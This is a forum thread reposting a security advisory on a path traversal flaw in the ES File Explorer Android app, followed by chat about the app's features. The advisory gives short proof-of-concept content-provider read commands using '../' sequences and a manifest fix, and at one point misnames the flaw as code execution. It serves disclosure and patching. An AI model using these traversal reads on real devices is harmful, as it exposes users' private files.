Aerosol Posted February 18, 2015 Report Posted February 18, 2015 Document Title:===============ES File Explorer v3.2.4.1 - Path Traversal VulnerabilityReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=1435CVE-ID:=======CVE-2015-1876Release Date:=============2015-02-17Vulnerability Laboratory ID (VL-ID):====================================1435Common Vulnerability Scoring System:====================================7.8Product & Service Introduction:===============================ES File Explorer is a free all-in-one including a file manager & application & tasks,support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer.It allows Android users around the world to manage their resources for free; you can see the files on your phone,access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G,EDGE or WiFi, and share with friends.(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop )Abstract Advisory Information:==============================An independent vulnerability laboraotory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application.Vulnerability Disclosure Timeline:==================================2015-02-17: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedAffected Product(s):====================ES APP GROUPProduct: ES File Explorer - Mobile Web Application (Android) 3.2.4.1 Exploitation Technique:=======================RemoteSeverity Level:===============HighTechnical Details & Description:================================A Path Traveral web vulnerability has been discovered in the official in the official ES File Explorer v3.2.4.1 mobile android web-application.The security vulnerability allows a remote attacker to unauthorized request local files and device system paths to compromise the application or device.The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continues the request. The attack vector is located on the application-side of the service and the request is http.The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromiseRequest Method(s): [+] POST & SyncVulnerable Module(s): [+] content://com.estrongs.files/Vulnerable Parameter(s): [+] pathAffected Module(s): [+] content://com.estrongs.files/system/Proof of Concept (PoC):=======================The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Package: com.estrongs.android.pop Application Label: ES File Explorer Process Name: com.estrongs.android.pop Version: 3.2.4.1 Data Directory: /data/data/com.estrongs.android.pop APK Path: /data/app/com.estrongs.android.pop-2.apk UID: 10235 GID: [3003, 3002, 3001, 1015, 1028] Permissions: - android.permission.WRITE_SETTINGS - android.permission.CHANGE_WIFI_STATE - android.permission.CHANGE_NETWORK_STATE - android.permission.INTERNET - android.permission.SET_WALLPAPER - android.permission.ACCESS_NETWORK_STATE - android.permission.ACCESS_WIFI_STATE - com.android.launcher.permission.INSTALL_SHORTCUT - com.android.launcher.permission.UNINSTALL_SHORTCUT - android.permission.BLUETOOTH - android.permission.BLUETOOTH_ADMIN - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.WRITE_MEDIA_STORAGE - android.permission.WAKE_LOCK - android.permission.READ_PHONE_STATE - android.permission.ACCESS_SUPERUSER - android.permission.VIBRATE - .PERMISSION - android.permission.CHANGE_WIFI_MULTICAST_STATE - android.permission.SYSTEM_ALERT_WINDOW - android.permission.GET_TASKS - android.permission.READ_EXTERNAL_STORAGE Defines Permissions: - NoneActivities:com.estrongs.android.pop.view.FileExplorerActivitycom.estrongs.android.pop.app.compress.CompressionActivitycom.estrongs.android.pop.app.compress.CompressionProxyActivitycom.estrongs.android.pop.app.ESFileSharingActivitycom.estrongs.android.pop.app.SaveToESActivitycom.estrongs.android.pop.app.LocalFileSharingActivitycom.estrongs.android.pop.app.PopVideoPlayercom.estrongs.android.pop.app.PopVideoPlayerProxyActivitycom.estrongs.android.pop.app.AudioPlayerProxyActivitycom.estrongs.android.pop.app.editor.PopNoteEditorcom.estrongs.android.pop.app.FileChooserActivitycom.estrongs.android.pop.app.ESContentChooserActivitycom.estrongs.android.pop.app.ESRingtoneChooserActivitycom.estrongs.android.pop.app.ESWallPaperChooserActivitycom.estrongs.android.pop.app.DownloaderActivitycom.estrongs.android.pop.app.BrowserDownloaderActivitycom.estrongs.android.pop.app.PopRemoteImageBrowsercom.estrongs.android.pop.ftp.ESFtpShortcutcom.estrongs.android.pop.app.ShowDialogActivitycom.estrongs.android.pop.app.AppCheckUpdateListcom.estrongs.android.pop.app.DefaultWindowSettingcom.estrongs.android.pop.app.DocumentExtModifyListcom.estrongs.android.pop.app.TransitActivityBroadcast(Receiver): com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver com.baidu.share.message.ShareReceiver com.estrongs.android.pop.EnableOEMConfig com.estrongs.android.pop.app.InstallMonitorReceiver com.estrongs.android.pop.app.StartServiceReceiverServices: com.estrongs.android.pop.bt.OBEXFtpServerService Permission: nullProviders:Authority: com.estrongs.files Read Permission: null Write Permission: null Content Provider: com.estrongs.android.pop.app.FileContentProvider Multiprocess Allowed: False Grant Uri Permissions: Trueread content://com.estrongs.files/system/../../../../../sdcard/<file>Read file hostsread content://com.estrongs.files/system/etc/hosts127.0.0.1 localhostSolution - Fix & Patch:=======================In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set.Vulnerable code:com.estrongs.files Read Permission: null Write Permission: nullandroid:exported="true" change "true" to "false"When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it.<provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>Fixed code:<provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>read content://com.estrongs.files/system/etc/hostsPermission Denial: opening provider com.estrongs.android.pop.app.FileContentProvider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid=10216) that is not exported from uid 10235Security Risk:==============The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8)Credits & Authors:==================Hadji Samir [s-dz@hotmail.fr]Disclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.comContact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.comSection: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contactSocial: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0labFeeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.phpPrograms: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™Source Quote
el_eel Posted February 18, 2015 Report Posted February 18, 2015 Salut! Ce este ES File Explorer? Quote
Aerosol Posted February 18, 2015 Author Report Posted February 18, 2015 (edited) Salut! Ce este ES File Explorer?ES File Explorer este un file manager pentru android.Cum ai tu la pc ( Windows Explorer ) asa Android are ( ES File Explorer ) @el_eelDescriptionES, 300 millions global downloads, file manager trend leader on Android!Rated as one of best resource management tools on Android market.ES File Explorer is a free, full-featured file and application manager. It functions as all of these apps in one: file manager, application manager, task killer, download manager, cloud storage client (compatible with Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3, and Ubuntu One...), FTP client, and LAN Samba client. It provides access to pictures, music, video, documents, and other files on both your Android devices and your computers.ES File Explorer allows Android users, no matter where they are, to manage their resources freely. You can access all of your files from your mobile device and share them with others. This app makes it easy to stay connected over 3G, 4G, EDGE, or Wi-Fi to share with friends, upload photos, and watch videos.ES File Explorer 3.0 currently supports 30+ languages:English, Russian, Japanese, Korea, French, Spanish, German, Italian, Czech, Hungarian, Ukrainian, Tamil, Catalan, Turkish, Lithuanian, Portuguese...This standard version is for Android 2.1, 2.2, 2.3, 3.1, 3.2, 4.0, 4.1,4.2 and 4.4. Android 1.5 ~ 2.0 users, please use ES File Explorer Cupcake.You can download older version from our official website.Classic Theme can be downloaded on Google Play.Features List:* File Manager – Manage your files like you do on your desktop or laptop using Multiple Select, Cut/Copy/Paste, Move, Create, Delete, Rename, Search, Share, Send, Hide, Create Shortcut, and Bookmark; operations can be performed on local files (on Android device) or remotely (on your computer)* Application Manager – categorize, uninstall, backup, and create shortcuts to your apps* Remote File Manager – when enabled, manage files on your phone from your computer* Built-in ZIP and RAR support allows you to compress and decompress ZIP files, unpack RAR files, and create encrypted (AES 256 bit) ZIP files* Built-in viewers and players for various file types, including photos, music, and videos; supports third-party applications, such as Quick office, for opening others* Shows thumbnails for APKs and images* Text viewers and editors* Access your home PC via WiFi with SMB* Functions as your FTP and WebDAV client. Manage files on FTP, FTPS, SFTP, and WebDAV servers just like you manage files on your SD card* Supports Dropbox, Box.net, Sugarsync, Google Drive (Google Docs is now a part of Google Drive), SkyDrive, Amazon S3, Yandex and more. ES File Explorer is an enhanced cloud storage client with more functions than the official versions,it can save photos, videos, and other files to your internet drives and share them with others.* Bluetooth file browser You can copy and paste files between Bluetooth ready devices. It supports OBEX FTP for browsing devices and transferring files between Bluetooth devices.* Kill tasks with a single click, increase memory and speed up your device -- includes a simple widget that stays on your home screen for knowing your current RAM situation and automatically killing tasks, with an ignore list to ignore the applications you want to keep running.Task Manager module required* Cache Cleaner and Autostart manager -- Delete those junk files that take up valuable storage space.Task Manager module required.* Root Explorer -- the ultimate set of file management tools for root users. Provides access to the entire file system and all data directories, and allows the user to change permissions.* Developers can visit our website for the developer interface for picking files from your applications, emailing attachments, etc.* More features to comeWe’re working to create the best file manager on Android, so plz do not hesitate to CONTACT US with your comments, suggestions, issues.FACEBOOK: https://www.facebook.com/EStrongsOther Video: 2)The GREATEST Android Apps: #68 ES File Explorer File Manager - YouTubeLink: https://play.google.com/store/apps/details?id=com.estrongs.android.pop Edited February 18, 2015 by Aerosol Quote
el_eel Posted February 18, 2015 Report Posted February 18, 2015 (edited) X-plore - File manager for mobile devicesPentru asta ai ceva? Esti meseriash?Intarziat:OK. Am inteles din prima. Puteai sa pui link, nu sa copiezi tot rahatu ala. Faci si tu reclama.Xplore ziceam. Edited February 18, 2015 by el_eel Quote